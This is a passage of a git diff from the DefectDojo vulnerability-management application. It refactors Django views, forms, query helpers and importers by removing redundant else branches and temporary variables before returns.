tab="engagements") return render(request, "dojo/copy_object.html", { @@ -427,8 +422,7 @@ def get_template(self): return "dojo/view_eng.html" def get_risks_accepted(self, eng): - risks_accepted = eng.risk_acceptance.all().select_related("owner").annotate(accepted_findings_count=Count("accepted_findings__id")) - return risks_accepted + return eng.risk_acceptance.all().select_related("owner").annotate(accepted_findings_count=Count("accepted_findings__id")) def get_filtered_tests( self, @@ -673,10 +667,10 @@ def add_tests(request, eid): if "_Add Another Test" in request.POST: return HttpResponseRedirect( reverse("add_tests", args=(eng.id, ))) - elif "_Add Findings" in request.POST: + if "_Add Findings" in request.POST: return HttpResponseRedirect( reverse("add_findings", args=(new_test.id, ))) - elif "_Finished" in request.POST: + if "_Finished" in request.POST: return HttpResponseRedirect( reverse("view_engagement", args=(eng.id, ))) else: @@ -751,8 +745,7 @@ def get_form( """ if request.method == "POST": return ImportScanForm(request.POST, request.FILES, **kwargs) - else: - return ImportScanForm(**kwargs) + return ImportScanForm(**kwargs) def get_credential_form( self, @@ -766,18 +759,17 @@ def get_credential_form( """ if request.method == "POST": return CredMappingForm(request.POST) - else: - # If the engagement is not present, return an empty form - if engagement is None: - return CredMappingForm() - # Otherwise get all creds in the associated engagement - return CredMappingForm( - initial={ - "cred_user_queryset": Cred_Mapping.objects.filter( - engagement=engagement, - ).order_by("cred_id"), - }, - ) + # If the engagement is not present, return an empty form + if engagement is None: + return CredMappingForm() + # Otherwise get all creds in the associated engagement + return CredMappingForm( + initial={ + "cred_user_queryset": Cred_Mapping.objects.filter( + engagement=engagement, + ).order_by("cred_id"), + }, + ) def get_jira_form( self, @@ -1401,8 +1393,7 @@ def view_edit_risk_acceptance(request, eid, raid, edit_mode=False): if not errors: logger.debug("redirecting to return_url") return redirect_to_return_url_or_else(request, reverse("view_risk_acceptance", args=(eid, raid))) - else: - logger.error("errors found") + logger.error("errors found") else: if edit_mode: @@ -1549,8 +1540,7 @@ def upload_threatmodel(request, eid): @user_is_authorized(Engagement, Permissions.Engagement_View, "eid") def view_threatmodel(request, eid): eng = get_object_or_404(Engagement, pk=eid) - response = FileResponse(open(eng.tmodel_path, "rb")) - return response + return FileResponse(open(eng.tmodel_path, "rb")) @user_is_authorized(Engagement, Permissions.Engagement_View, "eid") @@ -1589,9 +1579,8 @@ def get_engagements(request): if not url: msg = "Please use the export button when exporting engagements" raise ValidationError(msg) - else: - if url.startswith("url="): - url = url[4:] + if url.startswith("url="): + url = url[4:] path_items = list(filter(None, re.split(r"/|\?", url))) diff --git a/dojo/filters.py b/dojo/filters.py index 1461966c19e..35ceb205938 100644 --- a/dojo/filters.py +++ b/dojo/filters.py @@ -331,8 +331,7 @@ def get_tags_model_from_field_name(field): def get_tags_label_from_model(model): if model: return f"Tags ({model.__name__.title()})" - else: - return "Tags (Unknown)" + return "Tags (Unknown)" def get_finding_filterset_fields(metrics=False, similar=False, filter_string_matching=False): @@ -780,6 +779,7 @@ def any(self, qs, name): self.start_date = _truncate(start_date - timedelta(days=1)) self.end_date = _truncate(now() + timedelta(days=1)) return qs.all() + return None def current_month(self, qs, name): self.start_date = local_tz.localize( @@ -1927,8 +1927,7 @@ def set_hash_codes(self, *args: list, **kwargs: dict): def filter_queryset(self, *args: list, **kwargs: dict): queryset = super().filter_queryset(*args, **kwargs) queryset = get_authorized_findings(Permissions.Finding_View, queryset, self.user) - queryset = queryset.exclude(pk=self.finding.pk) - return queryset + return queryset.exclude(pk=self.finding.pk) class SimilarFindingFilter(FindingFilter, SimilarFindingHelper): diff --git a/dojo/finding/queries.py b/dojo/finding/queries.py index 7f213805a49..47386e43f86 100644 --- a/dojo/finding/queries.py +++ b/dojo/finding/queries.py @@ -68,14 +68,12 @@ def get_authorized_findings(permission, queryset=None, user=None): test__engagement__product__member=Exists(authorized_product_roles), test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), test__engagement__product__authorized_group=Exists(authorized_product_groups)) - findings = findings.filter( + return findings.filter( Q(test__engagement__product__prod_type__member=True) | Q(test__engagement__product__member=True) | Q(test__engagement__product__prod_type__authorized_group=True) | Q(test__engagement__product__authorized_group=True)) - return findings - def get_authorized_stub_findings(permission): user = get_current_user() @@ -101,14 +99,12 @@ def get_authorized_stub_findings(permission): test__engagement__product__member=Exists(authorized_product_roles), test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), test__engagement__product__authorized_group=Exists(authorized_product_groups)).order_by("id") - findings = findings.filter( + return findings.filter( Q(test__engagement__product__prod_type__member=True) | Q(test__engagement__product__member=True) | Q(test__engagement__product__prod_type__authorized_group=True) | Q(test__engagement__product__authorized_group=True)) - return findings - def get_authorized_vulnerability_ids(permission, queryset=None, user=None): @@ -151,10 +147,8 @@ def get_authorized_vulnerability_ids(permission, queryset=None, user=None): finding__test__engagement__product__member=Exists(authorized_product_roles), finding__test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), finding__test__engagement__product__authorized_group=Exists(authorized_product_groups)) - vulnerability_ids = vulnerability_ids.filter( + return vulnerability_ids.filter( Q(finding__test__engagement__product__prod_type__member=True) | Q(finding__test__engagement__product__member=True) | Q(finding__test__engagement__product__prod_type__authorized_group=True) | Q(finding__test__engagement__product__authorized_group=True)) - - return vulnerability_ids diff --git a/dojo/finding/views.py b/dojo/finding/views.py index 4b37ebc8a9a..8d453ab5fed 100644 --- a/dojo/finding/views.py +++ b/dojo/finding/views.py @@ -311,31 +311,29 @@ def get_test_id(self): def filter_findings_by_object(self, findings: QuerySet[Finding]): if product_id := self.get_product_id(): return findings.filter(test__engagement__product__id=product_id) - elif engagement_id := self.get_engagement_id(): + if engagement_id := self.get_engagement_id(): return findings.filter(test__engagement=engagement_id) - elif test_id := self.get_test_id(): + if test_id := self.get_test_id(): return findings.filter(test=test_id) - else: - return findings + return findings def filter_findings_by_filter_name(self, findings: QuerySet[Finding]): filter_name = self.get_filter_name() if filter_name == "Open": return findings.filter(finding_helper.OPEN_FINDINGS_QUERY) - elif filter_name == "Verified": + if filter_name == "Verified": return findings.filter(finding_helper.VERIFIED_FINDINGS_QUERY) - elif filter_name == "Out of Scope": + if filter_name == "Out of Scope": return findings.filter(finding_helper.OUT_OF_SCOPE_FINDINGS_QUERY) - elif filter_name == "False Positive": + if filter_name == "False Positive": return findings.filter(finding_helper.FALSE_POSITIVE_FINDINGS_QUERY) - elif filter_name == "Inactive": + if filter_name == "Inactive": return findings.filter(finding_helper.INACTIVE_FINDINGS_QUERY) - elif filter_name == "Accepted": + if filter_name == "Accepted": return findings.filter(finding_helper.ACCEPTED_FINDINGS_QUERY) - elif filter_name == "Closed": + if filter_name == "Closed": return findings.filter(finding_helper.CLOSED_FINDINGS_QUERY) - else: - return findings + return findings def filter_findings_by_form(self, request: HttpRequest, findings: QuerySet[Finding]): # Set up the args for the form @@ -358,9 +356,7 @@ def filter_findings_by_form(self, request: HttpRequest, findings: QuerySet[Findi def get_filtered_findings(self): findings = get_authorized_findings(Permissions.Finding_View).order_by(self.get_order_by()) findings = self.filter_findings_by_object(findings) - findings = self.filter_findings_by_filter_name(findings) - - return findings + return self.filter_findings_by_filter_name(findings) def get_fully_filtered_findings(self, request: HttpRequest): findings = self.get_filtered_findings() @@ -1017,9 +1013,8 @@ def process_finding_form(self, request: HttpRequest, finding: Finding, context: ) return finding, request, True - else: - add_error_message_to_response("The form has errors, please correct them below.") - add_field_errors_to_response(context["form"]) + add_error_message_to_response("The form has errors, please correct them below.") + add_field_errors_to_response(context["form"]) return finding, request, False @@ -1074,8 +1069,7 @@ def process_jira_form(self, request: HttpRequest, finding: Finding, context: dic ) return request, True, push_to_jira - else: - add_field_errors_to_response(context["jform"]) + add_field_errors_to_response(context["jform"]) return request, False, False @@ -1090,8 +1084,7 @@ def process_github_form(self, request: HttpRequest, finding: Finding, context: d add_external_issue(finding, "github") return request, True - else: - add_field_errors_to_response(context["gform"]) + add_field_errors_to_response(context["gform"]) return request, False @@ -1316,10 +1309,9 @@ def close_finding(request, fid): return HttpResponseRedirect( reverse("view_test", args=(finding.test.id,)), ) - else: - return HttpResponseRedirect( - reverse("close_finding", args=(finding.id,)), - ) + return HttpResponseRedirect( + reverse("close_finding", args=(finding.id,)), + ) product_tab = Product_Tab( finding.test.engagement.product, title="Close", tab="findings", @@ -1502,15 +1494,14 @@ def apply_template_cwe(request, fid): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("view_finding", args=(fid,))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to apply CWE template finding, please try again.", - extra_tags="alert-danger", - ) - else: - raise PermissionDenied + messages.add_message( + request, + messages.ERROR, + "Unable to apply CWE template finding, please try again.", + extra_tags="alert-danger", + ) + return None + raise PermissionDenied @user_is_authorized(Finding, Permissions.Finding_Edit, "fid") @@ -1549,13 +1540,12 @@ def copy_finding(request, fid): return redirect_to_return_url_or_else( request, reverse("view_test", args=(test.id,)), ) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to copy finding, please try again.", - extra_tags="alert-danger", - ) + messages.add_message( + request, + messages.ERROR, + "Unable to copy finding, please try again.", + extra_tags="alert-danger", + ) product_tab = Product_Tab(product, title="Copy Finding", tab="findings") return render( @@ -2002,8 +1992,7 @@ def apply_template_to_finding(request, fid, tid): ) return HttpResponseRedirect(reverse("view_finding", args=(finding.id,))) - else: - return HttpResponseRedirect(reverse("view_finding", args=(finding.id,))) + return HttpResponseRedirect(reverse("view_finding", args=(finding.id,))) @user_is_authorized(Test, Permissions.Finding_Add, "tid") @@ -2063,15 +2052,14 @@ def delete_stub_finding(request, fid): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("view_test", args=(tid,))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete potential finding, please try again.", - extra_tags="alert-danger", - ) - else: - raise PermissionDenied + messages.add_message( + request, + messages.ERROR, + "Unable to delete potential finding, please try again.", + extra_tags="alert-danger", + ) + return None + raise PermissionDenied @user_is_authorized(Stub_Finding, Permissions.Finding_Edit, "fid") @@ -2188,13 +2176,12 @@ def promote_to_finding(request, fid): ) return HttpResponseRedirect(reverse("view_test", args=(test.id,))) - else: - form_error = True - add_error_message_to_response( - "The form has errors, please correct them below.", - ) - add_field_errors_to_response(jform) - add_field_errors_to_response(form) + form_error = True + add_error_message_to_response( + "The form has errors, please correct them below.", + ) + add_field_errors_to_response(jform) + add_field_errors_to_response(form) else: form = PromoteFindingForm( initial={ @@ -2356,13 +2343,12 @@ def add_template(request): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("templates")) - else: - messages.add_message( - request, - messages.ERROR, - "Template form has error, please revise and try again.", - extra_tags="alert-danger", - ) + messages.add_message( + request, + messages.ERROR, + "Template form has error, please revise and try again.", + extra_tags="alert-danger", + ) add_breadcrumb(title="Add Template", top_level=False, request=request) return render( request, "dojo/add_template.html", {"form": form, "name": "Add Template"}, @@ -2411,13 +2397,12 @@ def edit_template(request, tid): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("templates")) - else: - messages.add_message( - request, - messages.ERROR, - "Template form has error, please revise and try again.", - extra_tags="alert-danger", - ) + messages.add_message( + request, + messages.ERROR, + "Template form has error, please revise and try again.", + extra_tags="alert-danger", + ) count = apply_cwe_mitigation(apply_to_findings=True, template=template, update=False) add_breadcrumb(title="Edit Template", top_level=False, request=request) @@ -2447,15 +2432,14 @@ def delete_template(request, tid): extra_tags="alert-success", ) return HttpResponseRedirect(reverse("templates")) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete Template, please revise and try again.", - extra_tags="alert-danger", - ) - else: - raise PermissionDenied + messages.add_message( + request, + messages.ERROR, + "Unable to delete Template, please revise and try again.", + extra_tags="alert-danger", + ) + return None + raise PermissionDenied def download_finding_pic(request, token): @@ -2661,13 +2645,12 @@ def merge_finding_product(request, pid): return HttpResponseRedirect( reverse("edit_finding", args=(finding_to_merge_into.id,)), ) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to merge findings. Findings to merge contained in finding to merge into.", - extra_tags="alert-danger", - ) + messages.add_message( + request, + messages.ERROR, + "Unable to merge findings. Findings to merge contained in finding to merge into.", + extra_tags="alert-danger", + ) else: messages.add_message( request, @@ -3137,8 +3120,7 @@ def find_available_notetypes(notes): break else: available_note_types.append(note_type_id) - queryset = Note_Type.objects.filter(id__in=available_note_types).order_by("-id") - return queryset + return Note_Type.objects.filter(id__in=available_note_types).order_by("-id") def get_missing_mandatory_notetypes(finding): @@ -3153,8 +3135,7 @@ def get_missing_mandatory_notetypes(finding): break else: notes_to_be_added.append(note_type_id) - queryset = Note_Type.objects.filter(id__in=notes_to_be_added) - return queryset + return Note_Type.objects.filter(id__in=notes_to_be_added) @user_is_authorized(Finding, Permissions.Finding_Edit, "original_id") diff --git a/dojo/finding_group/queries.py b/dojo/finding_group/queries.py index aae57f53c83..39b91c02665 100644 --- a/dojo/finding_group/queries.py +++ b/dojo/finding_group/queries.py @@ -46,10 +46,8 @@ def get_authorized_finding_groups(permission, queryset=None, user=None): test__engagement__product__member=Exists(authorized_product_roles), test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), test__engagement__product__authorized_group=Exists(authorized_product_groups)) - finding_groups = finding_groups.filter( + return finding_groups.filter( Q(test__engagement__product__prod_type__member=True) | Q(test__engagement__product__member=True) | Q(test__engagement__product__prod_type__authorized_group=True) | Q(test__engagement__product__authorized_group=True)) - - return finding_groups diff --git a/dojo/forms.py b/dojo/forms.py index acf3546285b..cdff2b53d52 100644 --- a/dojo/forms.py +++ b/dojo/forms.py @@ -597,8 +597,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -611,8 +610,7 @@ def clean_scan_date(self): return date def get_scan_type(self): - TGT_scan = self.cleaned_data["scan_type"] - return TGT_scan + return self.cleaned_data["scan_type"] class ReImportScanForm(forms.Form): @@ -1146,8 +1144,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -1224,8 +1221,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -1282,8 +1278,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -1406,8 +1401,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(cleaned_data["endpoints_to_add"]) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_add_list = endpoints_to_add_list + self.endpoints_to_add_list = endpoints_to_add_list return cleaned_data @@ -1677,8 +1671,7 @@ def clean(self): endpoints_to_add_list, errors = validate_endpoints_to_add(endpoint) if errors: raise forms.ValidationError(errors) - else: - self.endpoints_to_process = endpoints_to_add_list + self.endpoints_to_process = endpoints_to_add_list return cleaned_data @@ -2683,9 +2676,7 @@ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def clean(self): - form_data = self.cleaned_data - - return form_data + return self.cleaned_data class CredMappingForm(forms.ModelForm): @@ -2972,9 +2963,9 @@ def clean(self): if self.target == "engagement": msg = "JIRA Project needs a JIRA Instance, JIRA Project Key, and Epic issue type name, or choose to inherit settings from product" raise ValidationError(msg) - else: - msg = "JIRA Project needs a JIRA Instance, JIRA Project Key, and Epic issue type name, leave empty to have no JIRA integration setup" - raise ValidationError(msg) + msg = "JIRA Project needs a JIRA Instance, JIRA Project Key, and Epic issue type name, leave empty to have no JIRA integration setup" + raise ValidationError(msg) + return None class GITHUBFindingForm(forms.Form): @@ -3158,8 +3149,7 @@ class LoginBanner(forms.Form): ) def clean(self): - cleaned_data = super().clean() - return cleaned_data + return super().clean() class AnnouncementCreateForm(forms.ModelForm): @@ -3393,7 +3383,7 @@ def clean_expiration(self): if expiration < today: msg = "The expiration cannot be in the past" raise forms.ValidationError(msg) - elif expiration.day == today.day: + if expiration.day == today.day: msg = "The expiration cannot be today" raise forms.ValidationError(msg) else: @@ -3483,8 +3473,7 @@ def __init__(self, attrs=None): def decompress(self, value): if value: return pickle.loads(value) - else: - return [None, None, None, None, None, None] + return [None, None, None, None, None, None] def format_output(self, rendered_widgets): return "
    ".join(rendered_widgets) diff --git a/dojo/github_issue_link/views.py b/dojo/github_issue_link/views.py index f7bb90a37f2..e0ddabd1deb 100644 --- a/dojo/github_issue_link/views.py +++ b/dojo/github_issue_link/views.py @@ -52,11 +52,11 @@ def new_github(request): "Unable to authenticate on GitHub.", extra_tags="alert-danger") return HttpResponseRedirect(reverse("github")) - else: - gform = GITHUBForm() - add_breadcrumb(title="New GitHub Configuration", top_level=False, request=request) - return render(request, "dojo/new_github.html", - {"gform": gform}) + return None + gform = GITHUBForm() + add_breadcrumb(title="New GitHub Configuration", top_level=False, request=request) + return render(request, "dojo/new_github.html", + {"gform": gform}) @user_is_configuration_authorized("dojo.view_github_conf") diff --git a/dojo/group/queries.py b/dojo/group/queries.py index a8b70e6b761..dedb0d35e14 100644 --- a/dojo/group/queries.py +++ b/dojo/group/queries.py @@ -38,8 +38,7 @@ def get_authorized_group_members(permission): def get_authorized_group_members_for_user(user): groups = get_authorized_groups(Permissions.Group_View) - group_members = Dojo_Group_Member.objects.filter(user=user, group__in=groups).order_by("group__name").select_related("role", "group") - return group_members + return Dojo_Group_Member.objects.filter(user=user, group__in=groups).order_by("group__name").select_related("role", "group") def get_group_members_for_group(group): diff --git a/dojo/group/views.py b/dojo/group/views.py index 4f7dea473b5..fa2fd1e65b1 100644 --- a/dojo/group/views.py +++ b/dojo/group/views.py @@ -185,12 +185,11 @@ def process_forms(self, request: HttpRequest, group: Dojo_Group, context: dict): extra_tags="alert-success") return request, True - else: - messages.add_message( - request, - messages.ERROR, - "Group was not saved successfully.", - extra_tags="alert_danger") + messages.add_message( + request, + messages.ERROR, + "Group was not saved successfully.", + extra_tags="alert_danger") return request, False @@ -450,8 +449,7 @@ def edit_group_member(request, mid): extra_tags="alert-warning") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) + return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) if member.role.is_owner and not user_has_permission(request.user, member.group, Permissions.Group_Add_Owner): messages.add_message(request, messages.WARNING, @@ -465,8 +463,7 @@ def edit_group_member(request, mid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) + return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) add_breadcrumb(title="Edit a Group Member", top_level=False, request=request) return render(request, "dojo/edit_group_member.html", { @@ -492,8 +489,7 @@ def delete_group_member(request, mid): extra_tags="alert-warning") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) + return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) user = member.user member.delete() @@ -503,11 +499,9 @@ def delete_group_member(request, mid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - if user == request.user: - return HttpResponseRedirect(reverse("groups")) - else: - return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) + if user == request.user: + return HttpResponseRedirect(reverse("groups")) + return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) add_breadcrumb("Delete a group member", top_level=False, request=request) return render(request, "dojo/delete_group_member.html", { diff --git a/dojo/importers/auto_create_context.py b/dojo/importers/auto_create_context.py index 6325ece9699..9f2a1cb7e76 100644 --- a/dojo/importers/auto_create_context.py +++ b/dojo/importers/auto_create_context.py @@ -229,16 +229,15 @@ def get_or_create_product_type( # Look for an existing object if product_type := self.get_target_product_type_if_exists(product_type_name=product_type_name): return product_type - else: - with transaction.atomic(): - product_type, created = Product_Type.objects.select_for_update().get_or_create(name=product_type_name) - if created: - Product_Type_Member.objects.create( - user=get_current_user(), - product_type=product_type, - role=Role.objects.get(is_owner=True), - ) - return product_type + with transaction.atomic(): + product_type, created = Product_Type.objects.select_for_update().get_or_create(name=product_type_name) + if created: + Product_Type_Member.objects.create( + user=get_current_user(), + product_type=product_type, + role=Role.objects.get(is_owner=True), + ) + return product_type def get_or_create_product( self, diff --git a/dojo/importers/base_importer.py b/dojo/importers/base_importer.py index 22e9ee5cbfe..6a05b3934ce 100644 --- a/dojo/importers/base_importer.py +++ b/dojo/importers/base_importer.py @@ -255,11 +255,10 @@ def determine_process_method( parsed_findings, **kwargs, ) - else: - return self.sync_process_findings( - parsed_findings, - **kwargs, - ) + return self.sync_process_findings( + parsed_findings, + **kwargs, + ) def update_test_meta(self): """ @@ -276,7 +275,7 @@ def update_test_meta(self): if not self.commit_hash.isspace(): self.test.commit_hash = self.commit_hash - return None + return def update_timestamps(self): """ @@ -510,7 +509,7 @@ def verify_tool_configuration_from_test(self): # Return early as there is no value in validating further return # Validate that the test has a value - elif self.test is not None: + if self.test is not None: # Make sure the Tool_Configuration is connected to the product that the test is if self.api_scan_configuration.product != self.test.engagement.product: msg = "API Scan Configuration has to be from same product as the Test" @@ -536,7 +535,7 @@ def verify_tool_configuration_from_engagement(self): # Return early as there is no value in validating further return # Validate that the engagement has a value - elif self.engagement is not None: + if self.engagement is not None: # Make sure the Tool_Configuration is connected to the engagement that the test is if self.api_scan_configuration.product != self.engagement.product: msg = "API Scan Configuration has to be from same product as the Engagement" diff --git a/dojo/importers/default_reimporter.py b/dojo/importers/default_reimporter.py index 290e13f6ac5..9063838c73d 100644 --- a/dojo/importers/default_reimporter.py +++ b/dojo/importers/default_reimporter.py @@ -399,12 +399,12 @@ def match_new_finding_to_existing_finding( test=self.test, hash_code=unsaved_finding.hash_code, ).exclude(hash_code=None).order_by("id") - elif self.deduplication_algorithm == "unique_id_from_tool": + if self.deduplication_algorithm == "unique_id_from_tool": return Finding.objects.filter( test=self.test, unique_id_from_tool=unsaved_finding.unique_id_from_tool, ).exclude(unique_id_from_tool=None).order_by("id") - elif self.deduplication_algorithm == "unique_id_from_tool_or_hash_code": + if self.deduplication_algorithm == "unique_id_from_tool_or_hash_code": query = Finding.objects.filter( Q(test=self.test), (Q(hash_code__isnull=False) & Q(hash_code=unsaved_finding.hash_code)) @@ -412,7 +412,7 @@ def match_new_finding_to_existing_finding( ).order_by("id") deduplicationLogger.debug(query.query) return query - elif self.deduplication_algorithm == "legacy": + if self.deduplication_algorithm == "legacy": # This is the legacy reimport behavior. Although it's pretty flawed and doesn't match the legacy algorithm for deduplication, # this is left as is for simplicity. # Re-writing the legacy deduplication here would be complicated and counter-productive. @@ -423,9 +423,8 @@ def match_new_finding_to_existing_finding( test=self.test, severity=unsaved_finding.severity, numerical_severity=Finding.get_numerical_severity(unsaved_finding.severity)).order_by("id") - else: - logger.error(f'Internal error: unexpected deduplication_algorithm: "{self.deduplication_algorithm}"') - return None + logger.error(f'Internal error: unexpected deduplication_algorithm: "{self.deduplication_algorithm}"') + return None def process_matched_finding( self, @@ -441,16 +440,15 @@ def process_matched_finding( unsaved_finding, existing_finding, ) - elif existing_finding.is_mitigated: + if existing_finding.is_mitigated: return self.process_matched_mitigated_finding( unsaved_finding, existing_finding, ) - else: - return self.process_matched_active_finding( - unsaved_finding, - existing_finding, - ) + return self.process_matched_active_finding( + unsaved_finding, + existing_finding, + ) def process_matched_special_status_finding( self, @@ -480,7 +478,7 @@ def process_matched_special_status_finding( # We also need to add the finding to 'unchanged_items' as otherwise it will get mitigated by the reimporter # (Risk accepted findings are not set to mitigated by Defectdojo) # We however do not exit the loop as we do want to update the endpoints (in case some endpoints were fixed) - elif existing_finding.risk_accepted and not existing_finding.active: + if existing_finding.risk_accepted and not existing_finding.active: self.unchanged_items.append(existing_finding) return existing_finding, False # The finding was not an exact match, so we need to add more details about from the @@ -521,47 +519,44 @@ def process_matched_mitigated_finding( logger.debug(msg) # Return True here to force the loop to continue return existing_finding, True - else: - # even if there is no mitigation time, skip it, because both the current finding and - # the reimported finding are is_mitigated - # Return True here to force the loop to continue - return existing_finding, True - else: - if self.do_not_reactivate: - logger.debug( - "Skipping reactivating by user's choice do_not_reactivate: " - f" - {existing_finding.id}: {existing_finding.title} " - f"({existing_finding.component_name} - {existing_finding.component_version})", - ) - # Search for an existing note that this finding has been skipped for reactivation - # before this current time - reactivated_note_text = f"Finding has skipped reactivation from {self.scan_type} re-upload with user decision do_not_reactivate." - existing_note = existing_finding.notes.filter( + # even if there is no mitigation time, skip it, because both the current finding and + # the reimported finding are is_mitigated + # Return True here to force the loop to continue + return existing_finding, True + if self.do_not_reactivate: + logger.debug( + "Skipping reactivating by user's choice do_not_reactivate: " + f" - {existing_finding.id}: {existing_finding.title} " + f"({existing_finding.component_name} - {existing_finding.component_version})", + ) + # Search for an existing note that this finding has been skipped for reactivation + # before this current time + reactivated_note_text = f"Finding has skipped reactivation from {self.scan_type} re-upload with user decision do_not_reactivate." + existing_note = existing_finding.notes.filter( + entry=reactivated_note_text, + author=self.user, + ) + # If a note has not been left before, we can skip this finding + if len(existing_note) == 0: + note = Notes( entry=reactivated_note_text, author=self.user, ) - # If a note has not been left before, we can skip this finding - if len(existing_note) == 0: - note = Notes( - entry=reactivated_note_text, - author=self.user, - ) - note.save() - existing_finding.notes.add(note) - existing_finding.save(dedupe_option=False) - # Return True here to force the loop to continue - return existing_finding, True - else: - logger.debug( - f"Reactivating: - {existing_finding.id}: {existing_finding.title} " - f"({existing_finding.component_name} - {existing_finding.component_version})", - ) - existing_finding.mitigated = None - existing_finding.is_mitigated = False - existing_finding.mitigated_by = None - existing_finding.active = True - if self.verified is not None: - existing_finding.verified = self.verified + note.save() + existing_finding.notes.add(note) + existing_finding.save(dedupe_option=False) + # Return True here to force the loop to continue + return existing_finding, True + logger.debug( + f"Reactivating: - {existing_finding.id}: {existing_finding.title} " + f"({existing_finding.component_name} - {existing_finding.component_version})", + ) + existing_finding.mitigated = None + existing_finding.is_mitigated = False + existing_finding.mitigated_by = None + existing_finding.active = True + if self.verified is not None: + existing_finding.verified = self.verified component_name = getattr(unsaved_finding, "component_name", None) component_version = getattr(unsaved_finding, "component_version", None) @@ -706,9 +701,8 @@ def finding_post_processing( # Process vulnerability IDs if finding_from_report.unsaved_vulnerability_ids: finding.unsaved_vulnerability_ids = finding_from_report.unsaved_vulnerability_ids - finding = self.process_vulnerability_ids(finding) - return finding + return self.process_vulnerability_ids(finding) def process_groups_for_all_findings( self, @@ -767,8 +761,7 @@ def process_results( serialized_to_mitigate, serialized_untouched, ) - else: - return self.new_items, self.reactivated_items, self.to_mitigate, self.untouched + return self.new_items, self.reactivated_items, self.to_mitigate, self.untouched def calculate_unsaved_finding_hash_code( self, diff --git a/dojo/importers/endpoint_manager.py b/dojo/importers/endpoint_manager.py index 2ee3e7d3009..ba7172efaa3 100644 --- a/dojo/importers/endpoint_manager.py +++ b/dojo/importers/endpoint_manager.py @@ -57,7 +57,7 @@ def add_endpoints_to_unsaved_finding( endpoint=ep, defaults={"date": finding.date}) logger.debug(f"IMPORT_SCAN: {len(endpoints)} imported") - return None + return @dojo_async_task @app.task() @@ -79,7 +79,7 @@ def mitigate_endpoint_status( endpoint_status.mitigated_by = user endpoint_status.mitigated = True endpoint_status.save() - return None + return @dojo_async_task @app.task() @@ -100,7 +100,7 @@ def reactivate_endpoint_status( endpoint_status.mitigated = False endpoint_status.last_modified = timezone.now() endpoint_status.save() - return None + return def chunk_endpoints( self, @@ -158,7 +158,7 @@ def clean_unsaved_endpoints( endpoint.clean() except ValidationError as e: logger.warning(f"DefectDojo is storing broken endpoint because cleaning wasn't successful: {e}") - return None + return def chunk_endpoints_and_reactivate( self, @@ -182,7 +182,7 @@ def chunk_endpoints_and_reactivate( self.reactivate_endpoint_status(endpoint_status_list, sync=False) else: self.reactivate_endpoint_status(endpoint_status_list, sync=True) - return None + return def chunk_endpoints_and_mitigate( self, @@ -207,7 +207,7 @@ def chunk_endpoints_and_mitigate( self.mitigate_endpoint_status(endpoint_status_list, user, sync=False) else: self.mitigate_endpoint_status(endpoint_status_list, user, sync=True) - return None + return def update_endpoint_status( self, @@ -242,4 +242,4 @@ def update_endpoint_status( ) self.chunk_endpoints_and_reactivate(endpoint_status_to_reactivate) self.chunk_endpoints_and_mitigate(endpoint_status_to_mitigate, user) - return None + return diff --git a/dojo/jira_link/helper.py b/dojo/jira_link/helper.py index b5e3ba8b219..ee844280555 100644 --- a/dojo/jira_link/helper.py +++ b/dojo/jira_link/helper.py @@ -99,6 +99,7 @@ def is_push_all_issues(instance): jira_project = get_jira_project(instance) if jira_project: return jira_project.push_all_issues + return None # checks if a finding can be pushed to JIRA @@ -173,12 +174,11 @@ def get_jira_project(obj, use_inheritance=True): if obj.jira_project: return obj.jira_project # some old jira_issue records don't have a jira_project, so try to go via the finding instead - elif hasattr(obj, "finding") and obj.finding: + if hasattr(obj, "finding") and obj.finding: return get_jira_project(obj.finding, use_inheritance=use_inheritance) - elif hasattr(obj, "engagement") and obj.engagement: + if hasattr(obj, "engagement") and obj.engagement: return 